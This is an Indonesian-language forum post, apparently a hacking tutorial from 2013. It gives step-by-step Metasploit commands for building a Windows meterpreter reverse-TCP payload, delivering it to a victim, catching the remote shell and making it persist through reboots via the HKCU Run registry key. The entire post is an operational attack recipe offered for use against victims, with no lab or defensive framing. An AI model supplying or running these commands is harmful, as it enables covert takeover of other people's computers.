05-15-2013, 10:09 AM
langsung saja ya..
buka metasploit kalian disini saya menggunkan backtrack 5 r3
buka terminal ketikkan msfconsole untuk membuka metasploit
lalu masukkan exploit sebagai berikut
use exploit/multi/handler
set lport 4444
set lhost 192.168.1.73 ( isi dengan ip kalian )
exploit
setelah itu kita bikin listener dengan meterpreter
buka terminal baru ketikkan perintah
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.73 x > Desktop/4444.exe
disini nama payload saya adalah 4444.exe
setelah itu kirim payload tersebut ke pc korban atau dengan teknik lain
setelah korban mengeksekusi file payload tersebut
maka session meterpreter akan terbuka
setelah itu ketikkan perintah background pada meterpreter untuk memulai aksi mempermnentkan meterpreter
dan kita akan mencari exploit permanentnya dengan mengetik perintah
search persistence
dan lanjutkan untuk perintah selanjutnya
use post/windows/manage/persistence
set lhost 192.168.1.73
set lport 4444
set rexe /root/Desktop/4444.exe
set rexename xbuster404.exe
set session 1
exploit
dan sukses meterpreter sudah tertanam pada pc korban
sekarang kita coba test untuk membuktkanya
dengan me-reboot pc korban
dan pc korban kembali hidup
maka meterpreter session akan terbuka lagi
payload tersebut berada pada regedit HKCU > Software > Microsoft > Windows > CurrentVersion > RUN
selamat berexploitasi